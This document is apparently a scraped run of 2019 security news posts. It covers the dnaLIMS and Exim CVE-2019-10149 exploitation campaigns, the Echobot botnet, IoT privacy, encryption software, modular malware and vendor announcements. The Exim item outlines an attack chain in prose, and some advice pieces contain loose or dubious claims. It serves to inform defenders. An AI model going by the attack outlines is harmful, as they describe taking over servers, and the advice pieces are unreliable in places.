Even if the Sample is quite interesting per-se – since getting a low AV detection rate – it is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to see targeted attacks, by meaning of attacks targeting specific industries or specific sectors or specific states, and opportunistic attacks, by meaning of attacks spread all over the world without specific targets. Today we might introduce one more “attack type” the untargeted attack, by meaning of attacking everybody but not specific assets, industries or states (like in this analyzed case)

Further technical details, including IoCs and Yara rules are reported in the original post published on the Marco Ramilli’s blog:

About the author Marco Ramilli

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)

The post From Targeted Attack to Untargeted Attack appeared first on Security Affairs.

Hacker is targeting DNA sequencer applications from Iranian IP address

Threat actors are targeting Web-based DNA sequencer applications leveraging a still-unpatched zero-day to take over the targeted systems.

Starting from June 12, 2019, the researcher Ankit Anubhav from NewSky Security, observed threat actors targeting Web-based DNA sequencer applications. The attackers are leveraging a still-unpatched zero-day vulnerability, tracked as CVE-2017-6526, to gain full control over the targeted systems.

The vulnerability in dnaLIMS was reported to the vendor in 2017, but it is still unpatched.

The attackers are scanning the Internet for dnaLIMS, a web-based application to handle DNA sequencing operations, these devices are used in the research industry. The attacks were originated from the IP address that is located in Iran.

“From June 12 – 14, we saw regular attacks from , an IP located in Iran, utilizing CVE-2017-6526, an issue in dnaTools dnaLIMS 4-2015s13. According to, dnaLIMS™ is a Web based bioinformatics LIMS that provides scientists and researches with hardware independent software tools for processing and managing DNA sequencing requests.” reads a blog post published by the expert.

The hackers leverage the vulnerability to bind a shell and take control of the web server.

Why DNA sequencing apps?

Attackers could be interested in stealing hashes of DNA sequences from the application’s database to resell them on the dark web or compromising servers to add to their botnet.

We cannot exclude that threat actor behind these attacks are using exploit available online at random in the attempt of compromise the large number of systems.

It is still unclear why attackers are targeting DNA sequencing apps, the number of these devices is limited (only a few tens of devices exposed online) and it is unlike that hackers want to use compromise systems to carry out DDoS attacks.

“The exact motives of the attacker(s) is unknown. Unlike an IPCamera or Router based IoT device, these are very unique devices installed in scientific ,academic and medical institutions. As a result,the number of such devices is not very high and might not help greatly in DDoS.” concludes the expert.

“However, successful exploitation and DNA theft in specific cases can be fruitful. Either it can be sold in black market, or a high profile attacker can actually be looking for a specific persons’ data.

We are not aware of a patch for this bug. In fact, when we had a look at the original disclosure by ShoreBreakSecurity, we saw a funny disclosure response by the vendor,indicating they don’t take DNA theft seriously.”

The expert also analyzed historical activity related to the attacker’s IP address and discovered that it was also associated with nmap scans and with the use of two other exploits for Zyxel routers (CVE-2017-6884) and for Apache Struts flaw (CVE-2017-5638).

Pierluigi Paganini

(SecurityAffairs – DNA sequencer applications, hacking)

The post Hacker is targeting DNA sequencer applications from Iranian IP address appeared first on Security Affairs.

What does runtime container security really mean?

End-to-end protection for containers in production is required to avoid the steep operational and reputational costs of data breaches. As news of container attacks and fresh vulnerabilities continues to prove, short cuts (or incomplete security strategies) aren’t going to work. Runtime container security means vetting all activities within the container application environment, from analysis of container and host activity to monitoring the protocols and payloads of network connections. Containers running in production environments actively fulfill … More

The post What does runtime container security really mean? appeared first on Help Net Security.

Are U.S. companies overpaying to attract new talent?

While compensation remains a top driver to attract and retain talent in the U.S., employees only expect about a 10% salary increase to switch employers, while companies are offering average compensation increases around 15%, according to a recent survey by Gartner. While many U.S. employers continue to extend lucrative compensation offers to persuade workers to switch companies, the premiums to attract talent might not be as high as employers think. “Not only are U.S. employers … More

The post Are U.S. companies overpaying to attract new talent? appeared first on Help Net Security.

Appliance upgrades and excessive network latency delaying Office 365 deployments

Gateway appliance upgrades and excessive network latency continue to delay Office 365 deployments, according to Zscaler. Network congestion The survey showed that 41 percent of enterprises found network congestion as a major factor impacting the user experience. To address network issues, almost half of the enterprises surveyed are exploring the use of direct internet connections, which can reduce congestion and eliminate the latency caused by backhauling traffic. “Modern cloud applications require modern cloud architectures. Many … More

The post Appliance upgrades and excessive network latency delaying Office 365 deployments appeared first on Help Net Security.

New EU-funded project aims to disrupt wildlife cybercrime

A new European Union (EU)-funded project aims to disrupt criminals trafficking wildlife in or via the EU using the internet, postal or fast parcel services. The project is implemented by a strong coalition gathering WWF, IFAW, INTERPOL, the Belgian Customs and TRAFFIC. The project is led by WWF Belgium, in affiliation with TRAFFIC. Funded by the Internal Security Fund of the Directorate General for Migration and Home Affairs of the European Commission, the two-year “Disrupting … More

The post New EU-funded project aims to disrupt wildlife cybercrime appeared first on Help Net Security.

Human error still the cause of many data breaches

With the incidence of reported data breaches on the rise, more than half of all C-suite executives (C-Suites) (53%) and nearly three in 10 Small Business Owners (SBOs) (28%) who suffered a breach reveal that human error or accidental loss by an external vendor/source was the cause of the data breach, according to a Shred-it survey conducted by Ipsos. When assessing additional causes of data breaches, the report found that nearly half of all C-Suites … More

The post Human error still the cause of many data breaches appeared first on Help Net Security.

Worldwide IoT spending forecast to reach $726 billion this year

Worldwide spending on the Internet of Things (IoT) is forecast to pass the $1.0 trillion mark in 2022, reaching $1.1 trillion in 2023. CAGR for IoT spending A new update to the International Data Corporation (IDC) Worldwide Semiannual Internet of Things Spending Guide shows the compound annual growth rate (CAGR) for IoT spending over the 2019-2023 forecast period will be 12.6%. “Spending on IoT deployments continues with good momentum and is expected to be $726 … More

The post Worldwide IoT spending forecast to reach $726 billion this year appeared first on Help Net Security.

How to Book Your Next Holiday Online and NOT Get Scammed

Taking our tribe on an annual family holiday has always been a top priority for my husband and me. But with 4 sons – who all eat like ridiculous amounts – this can be an expensive exercise. So, like most people, I am always on the lookout for deals and ways to save money to our favourite holiday destinations.

But according to research from McAfee, our need to secure a great deal to a hot destination may mean we are cutting corners and taking risks online. Over one-third of us (32%) report that we are likely to use a website we have never heard of before just because it offers great deals!

And cybercriminals are fully aware of this, so they spend a lot of time and effort creating malicious travel websites and fraudulent links to lure us ‘travel nuts’ away from the reputable online travel players. Their goal is to get us to their fraudulent site, install malware on our devices so they can steal our personal information, passwords and, ideally, our money!

How Many Aussies Have Been Scammed?

McAfee’s research also shows that 1 in 5 of us have either been scammed or nearly scammed when booking a holiday online with many of us (32%) signing up for a deal that turned out to be fake. And horrifyingly, 28% of holiday scam victims only realised that they had been scammed when checking-in to their holiday accommodation!! Can you imagine breaking the news to the kids? Or worse still having to pay twice for the one holiday?

Cybercriminals Also Have Favourite Holiday Hot Spots

Not only are cybercriminals capitalising on our need for a deal when booking a holiday, but they are also targeting our favourite destinations. The findings from McAfee’s research show holiday hot spots such as Thailand, India, the Philippines and the UK generate the riskiest search results when people are on the hunt for holidays online.

The top holiday destinations for Aussies that hackers are targeting via potentially malicious sites:

  1. New Delhi, India
  2. Bangkok, Thailand
  3. London, England
  4. Phuket, Thailand
  5. Manila, Philippines

Cybercriminals take advantage of the high search volumes for accommodation and deals in these popular destinations and drive unsuspecting users to their malicious websites often using professional looking links, pop-up ads and even text messages.

What You Can Do to Avoid Being Scammed

With Aussie school holiday just a few weeks away, do not despair! There are definitely steps you can take to protect yourself when booking your Winter getaway. Here are my top tips:

  1. Think Before You Click

With 25% of holiday bookings occurring through email promotions and pop-up ads, it’s essential to properly research the company behind the ads before you proceed with payment. Check out reviews and travel forums to ensure it is a legitimate online travel store. And it’s always best to use a trusted online retailer with a solid reputation even if it costs a little more.

  1. Use Wi-Fi With Caution

Using unsecured Wi-Fi is a risky business when you are travelling. If you absolutely must, ensure it is secured BUT never conduct any financial or sensitive transactions when connected. Investing in a virtual private network (VPN) such as McAfee Safe Connect is the best way to ensure that your connection is secure and your data remains private.

  1. Protect Yourself

Ensuring your device has current comprehensive security protection, like McAfee Total Protection, will ensure any malicious websites will be identified when you are browsing. It will also protect your device against malware – which could come in handy if you are tricked into visiting a fraudulent site.

So, next time you come across an amazing, bargain-basement deal to Thailand, PLEASE take the time to do your homework. Is the retailer legitimate? What do the reviews say? What are the terms and conditions? And, if it isn’t looking rosy, remember, if it looks too good to be true, it probably is!

‘till next time

Alex xx


The post How to Book Your Next Holiday Online and NOT Get Scammed appeared first on McAfee Blogs.

Climbing the Vulnerability Management Mountain

The purpose of this series of blogs is to guide you on your journey up the Vulnerability Management Mountain (VMM). Like climbing a mountain, there is a lot of planning and work required, but when you get to the top, the view is amazing and well worth the journey. Your progress will depend on your […]… Read More

The post Climbing the Vulnerability Management Mountain appeared first on The State of Security.

Adding to the Toolkit – Some Useful Tools for Cloud Security

With more business applications moving to the cloud, the ability to assess network behavior has changed from a primarily systems administration function to a daily security operations concern. And whilst sec-ops teams are already familiar with firewall and network device log tools, these can be of limited used in a “cloud first” business where much […]… Read More

The post Adding to the Toolkit – Some Useful Tools for Cloud Security appeared first on The State of Security.

[Exchange Listing] CLB Token to be listed on Bitsdaq Exchange

Bitsdaw exchange listing CLB

The Cloudbric team is excited to announce that we will be adding a new exchange listing for our CLB token!

Bitsdaq exchange is an official partner of Bittrex, which is one of the premier cryptocurrency exchanges based out of the US.

Based on Bittrex’s unique exchange technology, Bitsdaq will help provide safe and reliable cryptocurrency trading activities for users based in the APAC region.

Users can also find Cloudbric’s CLB token listed on both Korea-based Bitsonic exchange, as well as BitForex which is targeted for global users.

Bitsdaq listing details:

  • Token: CLB
  • Exchange: Bitsdaq
  • Date: June (exact date will be announced on our Telegram)

For more information regarding our CLB token and new exchange listing announcements, please join our official Telegram community channel at


What is Bitsdaq?

Bitsdaq is a Hong Kong based cryptocurrency exchange based on the unique technology of its official partner, Bittrex exchange. Bitsdaq officially launched its exchange on January 29th, 2019 and currently boasts more than 2 million users with both mobile and web access for its exchange.

As an official partner of Bittrex exchange, one of the most globally recognized cryptocurrency exchanges, Bitsdaq helps expand Bittrex’s reach towards the APAC region through its unique and cutting edge technology.

Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Exchange Listing] CLB Token to be listed on Bitsdaq Exchange appeared first on Cloudbric.

Synack integrates crowdsourced human intelligence and AI for “smart” security testing

The debate on how we should best use Artificial Intelligence is ongoing, but no one can argue against its benefits when used to augment human work. Take self-driving cars: when Artificial Intelligence is used alongside humans, it provides features like improved safety and predictive driving. The same is true in cybersecurity; we will always need the creativity of human intelligence to beat the human adversary. However, we can also augment those humans with smart technology … More

The post Synack integrates crowdsourced human intelligence and AI for “smart” security testing appeared first on Help Net Security.

Grandstream launches new 802.11ac Wave-2 Wi-Fi access point

Grandstream, connecting the world since 2002 with award-winning unified communications solutions, announced the release of the newest addition to their GWN series of Networking Solutions. The GWN7630 is an 802.11ac Wave-2 Wi-Fi Access Point that offers dual-band 4×4:4 MU-MIMO technology and a sophisticated antenna design for maximum network throughput and expanded Wi-Fi coverage range. It supports advanced QoS, low-latency real-time applications, mesh networks, captive portals, 200+ concurrent clients per AP, 175-meter coverage range and dual … More

The post Grandstream launches new 802.11ac Wave-2 Wi-Fi access point appeared first on Help Net Security.

Bella Thorne published her private nude photos before a hacker that was threatening her

Bella Thorne is the last victim of a sextortion attack, in a case similar to the Fappening saga, a hacker threatened the actress to publish her private nude photos.

The hacker first obtained nude photos of Bella Thorne then threatened her to leak online the picture, but she gave an unsettling answer.

Bella Thorne published tweets of the stolen photos putting the hacker out of play.

The actress explained she has been harassed for the past 24 hours by a hacker who accessed to her nude photos.

bella thorne

The above message suggests that Bella Thorne has already reported to the authorities the sextortion attempts.

“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.

“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”

According to BleepingComputer, the hacker also shared with Thorne nude photos of other celebrities.

Pierluigi Paganini

(SecurityAffairs – Thorne, hacking)

The post Bella Thorne published her private nude photos before a hacker that was threatening her appeared first on Security Affairs.

Acronis Cyber Cloud now features native integration with ConnectWise Control

Acronis, a global leader in cyber protection, announced at IT Nation Explore, ConnectWise’s partner conference, that the Acronis Cyber Cloud service provider platform will now feature native integration with ConnectWise Control. In addition, Acronis is expanding the features and functionality available in some of ConnectWise’s solutions that are already integrated with the platform. These integrations mean service providers using ConnectWise and Acronis Cyber Cloud can streamline their business and deliver new generation cyber protection services … More

The post Acronis Cyber Cloud now features native integration with ConnectWise Control appeared first on Help Net Security.

eCube Systems partners with LTCG to develop a dynamic security offering

eCube Systems, a provider of the NXTware hybrid infrastructure platform and legacy modernization tools and services, announced that it will enter into a joint venture agreement with Lima-Thompson Consulting (LTCG) to develop and market advanced security applications to Fortune 500 companies. “eCube is pleased to announce this joint venture developing an enterprise security application” says Kevin Barnes Managing Partner at eCube Systems. “With our expertise in Hybrid Infrastructure Platforms and LTCG’s in depth expertise and … More

The post eCube Systems partners with LTCG to develop a dynamic security offering appeared first on Help Net Security.

Security & Privacy Concerns in IoT Devices

Today in the IoT era, both competing systems and services are streamlined in various areas of the world, and new businesses are emerging from the ground up. In turn, whether we like it or not people’s lives become more convenient. As we highlighted time and time again here in, convenience is a natural enemy of security. The fact that we attached Internet-dependent sensors to things we interact with means that our personal information is more likely to be collected, both by either the vendor/service provider or some other 3rd party. So to speak, the danger of someone watching over our daily activities, our habits and the data we create.

Where personal information is stored, personal information is drawn out, analyzed, used, by unknown parties due to easy availability. One of the reasons is that IoT has become a problem, as these devices are relatively easy to buy. There are devices that are likely to cause serious problems if operated by an authorized user, such as IP cameras that are left running 24/7 and have an Internet connection. So is medical equipment and new car models such as those released by Tesla. We are highly dependent on “convenient” technology, without fully understanding the implications of our purchase to our personal privacy and data security.

For cybercriminals, their motivation is directly linked to money. Vulnerable machines that seldom receive patches and security updates such as ATMs are very much exposed to possible attacks. The POS terminal used by various merchants, used to be just a direct link from the POS device to the bank’s systems are now connected to the Internet, especially convenient for customers who use Visa or Mastercard services.

The IoT devices in offices and private homes directly conflicts how we treated computing. Today safety can only be assured through air-gap. Basically, in order to minimize the chance of becoming a victim of cybercriminals, the only valuable solution is to disconnect from the Internet. Security assurance is needed by online users, but it requires a different approach, as working offline for them is not really an option, a dedicated machine with an Internet connection is always required.

Acquisition of IoT needs to be studied thoroughly, is it really needed by the office? There is still not standard when it comes to these devices, as Google’s Android Things and Microsoft Azure Sphere are still competing for domination in the IoT space. IoT devices also have weaker processors (SOCs), much less sophisticated than an entry level smartphone in fact. Such hardware cannot host complex apps like antivirus software, as we have learned the hard way, installation of an antimalware product increases the system resource usage, which cannot be provided in a weak computing device.

At the very least, if a firm decides to embrace the IoT revolution, such device need to be behind a hardware firewall. Giving it a connection that is physically not connected to the main corporate network but only plain Internet connection behind a NAT will greatly secure it. IoT vendors also issue regular firmware updates for their devices, and these updates contain bug fixes and security patches. A system administrator worth his salt will not delay updates for IoT devices.

Also, Read

Factors to Consider When Securing IoT Devices

Cybersecurity Risks with Smart Devices and IoT

The post Security & Privacy Concerns in IoT Devices appeared first on .

Brinqa appoints Will Droste as CTO

Brinqa, the pioneer in knowledge-driven cyber risk services, announced it has named former Sun Microsystems and Arris technology leader Will Droste as its new Chief Technology Officer (CTO). Droste will lead the company’s Technology Innovation Center and drive the continued growth of the Brinqa Cybersecurity Ecosystem, reporting directly to CEO Amad Fida. “Getting more out of their security investments is top of mind for organizations around the globe and requires a knowledge-driven conversation,” said Amad … More

The post Brinqa appoints Will Droste as CTO appeared first on Help Net Security.

New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.

Recently a new botnet, tracked Echobot, appeared in the threat landscape its operators are adding new exploits to infect a broad range of systems, including IoT devices, enterprise apps Oracle WebLogic and VMware SD-Wan.

The Echobot botnet was first detected by experts at PaloAlto Networks early this month, the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators added 8 new exploits, but currently, it includes 26 exploits.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

Echobot targets

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

The experts pointed out that was not simple to determine the vulnerabilities that were being exploited by the botnet because some of them had no CVE numbers assigned.  

After the contacted MITRE, the organizations assigned them identification numbers.

Below the list of the exploits included in the Echobot variant discovered by the expert, some of the flaws triggered by the bot are decade-old vulnerabilities:


The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect the larger number of systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)

The post New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits appeared first on Security Affairs.

Top 5 Encryption Software to Securely Encrypt Your Files in the Cloud

These past few years, the insurance industry has expanded its market to cover tech-related damages. Those who signed up for their insurance plans under this new scheme can claim damages if they lost their productivity due to malware attack, phishing schemes, and social engineering. However, never become a victim yourself, aside from reliable backups that can easily reverse lost files, encryption is a key to make files private. Encrypted files stored in the cloud are safe from hackers, given that what they stored are actually just binary blobs of scrambled data.

Here in, we highly recommend a combination of encryption solutions in order to maximize data privacy. This combination is composed of two parts:

  • Storage device encryption

As the name implies, this covers the lock down of the actual storage hardware. Full disk encryption help prevents outsiders from viewing the contents of the hard drive without proper authentication that will unscramble the files stored. Encrypted hard drives are usually required for mobile corporate users, as the chance of their laptops being stolen or lost is always a probability.

  • File & Folder encryption

This locks down specific files and folders in order to maintain privacy. These encrypted files can be uploaded to the NAS or to a cloud-storage account without any worries of data leaks the moment the storage was accessed by outsiders.

We highly recommend the use of both Storage device and File & Folder encryption tools in order to lock down the actual storage device (for local storage) and individual files/folders (for cloud-based storage). The below data encryption solutions are the most common and known to be safe to use:

1. AESCrypt

This is a very well known encryption solution for locking down files and folders. Its claim to fame is its cross-platform feature, with versions compatible for Linux, MacOS, and Windows. AESCrypt supports scripting using C# and Java languages, and best of all it is released to the public as an open-source project. Being open-source means the program can be audited by any interested party. AESCrypt provides either 256 or 128-bit AES encrypted cipher. Being open-source it does not have user restriction or installation restriction, it can be used by casual users and professional individuals.

2. AxCrypt

This file and folder encryption software is a veteran in the Industry, with variants that support Windows as old as Windows 98. AxCrypt integrates itself to Windows Explorer, enabling users to selectively encrypt and decrypt files and folders just by right-clicking them. A version for MacOS is also available which also integrates itself to Finder. Aside from that, it is also available for Android, installing it enables mobile users to enjoy the protection provided by the 256-bit AES encryption standard while highly integrating itself with Google Drive or DropBox if installed.

3. Windows Bitlocker

Microsoft bundles a built-in full disk encryption software on all “Professional” or above editions of Windows since Windows Vista. This is used by many organizations and large multinational companies, as they have volume licensing for Windows Professional Editions. The good thing for using Windows BitLocker is as part of the operating system, it continues to receive updates and refinements through Windows Auto Update. BitLocker is exclusively only for Windows and cannot be installed on other platforms.

4. File Vault

This is the counterpart of BitLocker for the MacOS platform. With File Vault rolled-out, MacOS system disk itself is locked down using 256-bit AES key. This prevents the hard drive (or SSD) from being booted and accessed even on another Mac computer. File Vault is exclusively a MacOS encryption app.

5. VeraCrypt

This is the spiritual successor of the open source encryption software, TrueCrypt which was abandoned in version 7.1. VeraCrypt provides a cross-platform full disk encryption capability, with versions available for download under Windows, MacOS, and Linux. Decryption is automatic once correct user credentials are provided, as VeraCrypt uses a virtual encrypted disk in order to smoothly transition to the encrypted storage for user files within the operating system.

Also. Read

A Beginner’s Guide to Data Encryption and its Relevance

Upgrade Your Encryption-Key Management System

The post Top 5 Encryption Software to Securely Encrypt Your Files in the Cloud appeared first on .

Linux worm spreading via Exim servers hit Azure customers

On Friday, security experts at Microsoft warned of a new Linux worm, spreading via Exim email servers, that already compromised some Azure installs.

Bad actors continue to target cloud services in the attempt of abusing them for several malicious purposes, like storing malware or implementing command and control servers.

Microsoft Azure is not immune, recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

Researchers already warned of the presence of some malware on the Microsoft Azure platform.

At the end of last week, Microsoft warned of a new Linux worm, spreading via Exim servers, that already compromised some Azure installs.

Recently security experts reported ongoing attacks targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions. Different groups of hackers are exploiting the CVE-2019-10149 flaw to take over them.

The critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

Exim CVE-2019-10149

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The flaw could lead to remote code execution with root privileges on the mail server, unfortunately, the vulnerability is easily exploitable by a local and a remote attacker in certain non-default configurations

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February, but a large number of operating systems are still affected by the flaw.

CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers then when they will be compromised the initially deployed script will download a second script designed to check if OpenSSH is installed on the compromised machine.

In case OpenSSH is not present, it will install it and start it to gain root logins via SSH using a private/public RSA key for authentication.

Microsoft has now detected a Linux worm that leverages the above flaw in vulnerable Linux Exim email servers in a cryptojacking campaign.

“This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.” reads the advisory published by Microsoft.

Microsoft pointed out that Azure has already implemented controls to limit the spread of this Linux worm, but warns customers of using up to date software to prevent the infection. 

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs.” continues the advisory. “As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.”

Pierluigi Paganini

(SecurityAffairs – Exim, Linux worm)

The post Linux worm spreading via Exim servers hit Azure customers appeared first on Security Affairs.

Week in review: DevSecOps readiness, human bias in cybersecurity, Linux servers under attack

Here’s an overview of some of last week’s most interesting news and articles: CISO do’s and don’ts for board reporting Security is no longer just a job for IT – it impacts all areas of a business, from brand perception to the bottom line. As a result, CISOs are increasingly being asked to deliver cybersecurity reports to their boards, including information on global trends, security performance, security strategy, and security spend. Vulnerabilities allow attackers to … More

The post Week in review: DevSecOps readiness, human bias in cybersecurity, Linux servers under attack appeared first on Help Net Security.

New Hybrid Computing, Same Security Concerns

Pulse Secure, with the cooperation of IDG Connect has released its 2019 State of Enterprise Secure Access research paper, detailing how cloud computing has influenced companies’ daily operations and how secure the vendor platforms are. The business world is moving to the new platform, the cloud, slowly migrating from the decade-old “internally-located” servers for their applications and day-to-day activities. That ultimately means the Internet, which was considered as an “external network” is now actually the direct computing platform for storing files and host desktop applications.

In the report, Pulse Secure has highlighted the importance for companies, large and small to implement “ZeroTrust” across the board. It is a policy model where everything needs to be verified before permissions can be delegated. This is with strong compliance with the goal of any company to have effective identity management, device management, and secure protocols. The report also recognizes that mobile computing workforce is here to stay, but through various technologies including VPN (Virtual Private Network) are highly utilized to provide some level of privacy and security for the corporate mobile users.

The study conducted by the IDG Connect and Pulse Secure partnership covers 300 carefully selected Senior IT Leaders from Germany, Switzerland, United States Austria and UK in order to measure their IT security challenges in their company’s respective daily operations, deployment of software/hardware strategies, degree of confidence of the organization that risks can be mitigated on time and the methodology used in order to arrive at a decision on what products and services to sign-up for to “fortify corporate security”.

Years ago, many organizations are highly dependent on their company’s local data center for their storage, while applications were still often used and loaded from the local PC hard disks. More and more organizations depend on public and private cloud services in order to simplify deployment of critical applications to the organizations.

Planned IT delivery investment

Secure Pulse accounted that a whopping 63% of IT professionals and leaders surveyed shows the tremendous growth of dependence with Public and Private cloud infrastructure which started last year and continuing this year, 2019. Organizations are moving away to purely desktop-based applications and local hosting of files but started strong adoption of cloud-storage and cloud-based apps similar to what used to do with a desktop version of the software.

Top 5 access security incidents with significant to high impact

The report also featured how the 300 IT security leaders view the problems surrounding corporate IT. The top IT security and privacy concerns raised by them are:

  1. Malware
  2. Unauthorized/vulnerable endpoint use
  3. Mobile or web app exposure
  4. Unauthorized data and rouse access by insecure endpoint or privileged users
  5. Unauthorized app/resource access including lax authentication or encryption

High Impact gaps are also presented by Secure Pulse which make organizations becoming desperate with a quick solution, something that can never be achieved in the real world:

  • Poor user, device discovery and mobile computing exposure
  • Application availability
  • Uncoordinated authorization
  • Inconsistent, incomplete enforcement, week device access and configuration compliance
  • Security gateway sprawl, inconsistent/incomplete remediation

Our survey suggests that the majority of respondents are experiencing issues in application availability (81%) in terms of ensuring responsiveness and reliable access for users. This may suggest a need to improve application usage analytics and load balancing automation,” the report summarized.

Also Read:

The 5 Steps to Ensure Cloud Security

Cloud Storage Security Strategy And Risks

The post New Hybrid Computing, Same Security Concerns appeared first on .

Modular Malware In The Nutshell

We are in the age of computing where programs are growing to a point towards feature-richness at best and bloatware at worst. Malware itself is also software, developers creating malware also have access to the same development environment as any other developers of legal software. They also realized that their malware was also starting to become bloatware, as they build more and more features just for the purpose of bypassing antimalware products. And we should not start the discussion about how the antimalware industry kept on producing bloated antivirus and Endpoint products for the last ten years.

The larger the malware, the easier it gets detected by both antivirus products and even through keen observation of highly experienced system administrators. So what did they do? Divide their big malware to smaller chunks, with the main module containing “calls” that enable it to download a certain sub-module which performs other tasks for the malware. Here in, we have covered since last year about VPNFilter, a malware that resides both on Windows machines and the user’s home routers’ firmware.

VPNFilter survives from the checks of the antivirus software since it has the capability to export a part of itself, a submodule to the home router. Ten years ago, such capability for malware was just science-fiction. The need for their malware to survive, such capability needs to be developed. Years ago, there were cases malware tried to hide itself in the BIOS firmware of the computer and the video cards. Malware authors cannot do it again, as the BIOS gave way to today’s UEFI (Unified Extensible Firmware Interface) which implements stricter checks with writes to its firmware area.

Typical recommendations such as rebooting the router will reduce VPNFilter its staged modular approach makes it difficult for any router to remain uninfected, however. Until such time that the source PC is removed from the network, the router with flawed firmware will continue to get infected by the same malware. Even resetting the router will not do any good, as long as the source of infection remains online. What VPNFiIter started continued as the start of 2019 marks the detection and identification of 150,000 modular malware in the wild.

Security researchers are expecting more modular type of malware in the coming months and years to come. The good news is due to the need to download sub-modules from the command and control (C&C) servers, authorities can shutdown the physical servers for good. That will make modular malware a short-lived creation, well that is what we are hoping for. However, the world is more surprising than what meets the eye, malware development does not happen in isolation. New malware, in fact thousands new variants are developed every single day. It will be impractical to replicate the FBI’s success over shutting down the C&C of all modular malware that will be discovered.

What are the practical ways to somehow lessen the chance of contacting a modular malware? Practical answer is to practice safe computing practices:

  1. Be doubtful of pop-ups, pop-unders and website redirectors. These misdemeanors are what Google itself is trying to stop by building a new feature in Chromium-based browsers to auto-block those actions by any website. A well-behaved site will not use pop-ups, pop-unders and website redirectors.
  2. Never neglect firmware updates for your home router, operating system and any Internet-facing apps. These updates include necessary and critical patches that prevents security vulnerabilities from being exploited.
  3. Never ignore establishing a credible backup habit. This can be a network shared drive, a NAS box or even the cloud. It is also strongly recommended encrypting the files first locally before uploading them to minimize damage when the cloud provider gets hacked at any point.
  4. Establish a reliable SNMP system which can monitor ports and external IP address communication of the network to the public Internet. It is very costly for an organization to establish a reliable SNMP, but it needs to be done, it is an investment worth spending for. It is much better to spend for security than spending for damage control after a cyber attack incident.

The post Modular Malware In The Nutshell appeared first on .

Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

newsletter Digging The Deep Web

Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
